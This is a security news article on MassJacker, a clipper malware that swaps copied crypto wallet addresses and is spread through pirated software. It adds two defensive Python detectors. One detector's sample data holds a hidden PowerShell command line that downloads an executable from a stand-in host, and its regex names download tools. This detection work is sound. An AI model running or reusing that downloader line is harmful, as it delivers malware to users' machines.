Monday, March 17, 2025

MassJacker Clipper Malware Targets Users Installing Pirated Software


A recent investigation has uncovered previously unknown cryptojacking malware, dubbed MassJacker, which primarily targets users who download pirated software from sites like pesktop.com.

This malware operates by replacing cryptocurrency wallet addresses copied by users with those belonging to the attackers, aiming to redirect funds to the threat actors’ wallets.
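The clipboard rewrite described above is what a "clipper" does, and it is also what a defender can look for: a wallet address is copied, then a fraction of a second later the clipboard holds a different address of the same family, written by a process that has no business touching it. The following Python script is an added example, not code from the article or from CyberArk's analysis. It assumes a clipboard collector that records timestamp, writing process and text (on Windows that could be built on `GetClipboardOwner` plus a clipboard-update listener; that collector is not shown here) and runs the detection logic over a constructed timeline with made-up addresses.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Simplified address shapes for the two families most often targeted by clippers.
# These are illustrative only (no checksum validation); a production detector
# would also verify Base58Check / EIP-55 checksums.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the address family of `text`, or None if it is not an address."""
    text = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return family
    return None


@dataclass
class ClipboardEvent:
    ts: float        # seconds since monitoring started
    writer: str      # image name of the process that set the clipboard
    content: str     # clipboard text after the write


def detect_clipboard_swaps(events: List[ClipboardEvent], max_gap: float = 2.0) -> List[dict]:
    """Flag a wallet address that is replaced by a *different* address of the
    same family within `max_gap` seconds of being copied.

    A user copying a second address minutes later is not flagged (gap too
    large); a clipper rewriting the clipboard within a fraction of a second,
    typically from an unexpected process, is.
    """
    alerts = []
    for prev, cur in zip(events, events[1:]):
        prev_family = classify_address(prev.content)
        cur_family = classify_address(cur.content)
        if prev_family is None or cur_family is None:
            continue
        same_family = prev_family == cur_family
        changed = prev.content.strip() != cur.content.strip()
        if same_family and changed and (cur.ts - prev.ts) <= max_gap:
            alerts.append({
                "family": cur_family,
                "original": prev.content.strip(),
                "replacement": cur.content.strip(),
                "writer": cur.writer,
                "gap_seconds": round(cur.ts - prev.ts, 3),
            })
    return alerts


# Constructed clipboard timeline (not real telemetry; the addresses are fake and
# only shaped to match the patterns above). Event 3 models the behaviour the
# article attributes to MassJacker: the injected InstalUtil.exe rewrites a freshly
# copied Bitcoin address with an attacker-controlled one.
SAMPLE_EVENTS = [
    ClipboardEvent(0.0, "chrome.exe", "invoice #1042"),
    ClipboardEvent(10.0, "chrome.exe", "1CopiedByUserAddrAAAAAAAAAAAAAAAAA"),
    ClipboardEvent(10.3, "InstalUtil.exe", "1SwappedAddrAttackerAAAAAAAAAAAAAA"),
    ClipboardEvent(60.0, "chrome.exe", "0x1234567890abcdef1234567890abcdef12345678"),
    # The user copies another address two minutes later: a legitimate change, not a swap.
    ClipboardEvent(180.0, "chrome.exe", "0xabcdefabcdefabcdefabcdefabcdefabcdefabcd"),
]


def run_demo() -> List[dict]:
    return detect_clipboard_swaps(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_demo():
        print(f"[ALERT] {alert['family']} address swapped by {alert['writer']} "
              f"after {alert['gap_seconds']}s: {alert['original']} -> {alert['replacement']}")
```

Run as-is, the script reports exactly one swap (the InstalUtil.exe write) and stays silent on the later, slower change of Ethereum address. The same two checks, same address family and a short gap, are what a user can apply by hand: compare the pasted address against the one that was copied before sending funds.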

The discovery highlights the risks associated with using unauthorized software sources and the evolving nature of cryptojacking threats.

[Figure: MassJacker infection chain diagram]

Infection Chain and Techniques

The MassJacker infection chain begins with the execution of a cmd script followed by a PowerShell script, which downloads additional executables.

One of these executables is identified as Amadey, a well-known botnet, while the others are .NET executables compiled for different architectures.
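The chain just described (a cmd script that launches PowerShell, which in turn downloads further executables) leaves a recognisable parent/child pattern in process-creation telemetry. The Python below is an added example, not part of the article or of CyberArk's research: it runs a simple chain detector over constructed Sysmon-style records. The record layout, the download-cmdlet list, the user-writable path markers and the `example.invalid` URL are all assumptions made for the illustration.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Command-line fragments that indicate PowerShell is acting as a downloader.
DOWNLOAD_INDICATORS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|"
    r"Start-BitsTransfer|Invoke-RestMethod|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)

# Locations a standard user can write to; a dropped second stage usually lands here.
USER_WRITABLE_MARKERS = (
    "\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\",
)


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def find_download_chains(events: List[Dict]) -> List[Dict]:
    """Return cmd.exe -> powershell.exe (downloader) -> dropped-executable chains.

    Each chain records the cmd and PowerShell pids plus the pids of any child
    process whose image lives in a user-writable directory.
    """
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)

    chains = []
    for cmd in events:
        if image_name(cmd["image"]) != "cmd.exe":
            continue
        for ps in children[cmd["pid"]]:
            if image_name(ps["image"]) not in ("powershell.exe", "pwsh.exe"):
                continue
            if not DOWNLOAD_INDICATORS.search(ps["cmdline"]):
                continue
            dropped = [c["pid"] for c in children[ps["pid"]] if is_user_writable(c["image"])]
            chains.append({"cmd_pid": cmd["pid"], "powershell_pid": ps["pid"], "dropped_pids": dropped})
    return chains


# Constructed process-creation records in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\Downloads\cracked_app\install.cmd"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/stage2.exe', $env:TEMP + '\\stage2.exe')\""},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\user\AppData\Local\Temp\stage2.exe", "cmdline": "stage2.exe"},
    # Benign noise: an interactive cmd and a PowerShell session that downloads nothing.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]


def run_demo() -> List[Dict]:
    return find_download_chains(SAMPLE_EVENTS)


if __name__ == "__main__":
    for chain in run_demo():
        print(f"[ALERT] cmd.exe pid {chain['cmd_pid']} -> powershell.exe pid "
              f"{chain['powershell_pid']} downloader -> dropped pids {chain['dropped_pids']}")
```

On the sample data the detector reports one chain (pids 200, 300, dropped 400) and ignores the benign cmd/PowerShell pair. In a real environment the same logic would be fed from Sysmon Event ID 1 or an EDR process-creation stream, and the dropped-executable check is what separates a downloader that actually ran something from one that only fetched a file.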

The malware employs sophisticated anti-analysis techniques, including JIT Hooking and metadata token mapping, to evade detection.

These techniques are reminiscent of those used by another malware, MassLogger, suggesting a possible connection between the two threats.

The malware uses a custom virtual machine to further obfuscate its operations, executing scripts that manage control flow and deobfuscate additional resources.

Once fully loaded, MassJacker injects its payload into a process called InstalUtil.exe, where it implements cryptojacking functionality.

[Figure: the MassJacker configuration]

According to CyberArk, this includes replacing copied cryptocurrency addresses with attacker-controlled ones and downloading encrypted lists of wallets from Command and Control (C2) servers.

Impact and Analysis

The investigation revealed that MassJacker has been associated with over 750,000 unique wallet addresses, with one wallet holding over $300,000.

However, most wallets were found to be empty, and the total amount of money in active wallets was significantly lower.

The researchers suspect that much of the money in these wallets may not have originated from cryptojacking activities but from other malicious operations.

The use of a consistent encryption scheme allowed researchers to decrypt older files and uncover additional addresses, highlighting the malware’s extensive reach.

The discovery of MassJacker underscores the importance of avoiding pirated software and the need for robust security measures to protect against evolving cyber threats.

As cryptocurrencies continue to attract attention, malware like MassJacker will likely remain a significant concern for users and security professionals alike.


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
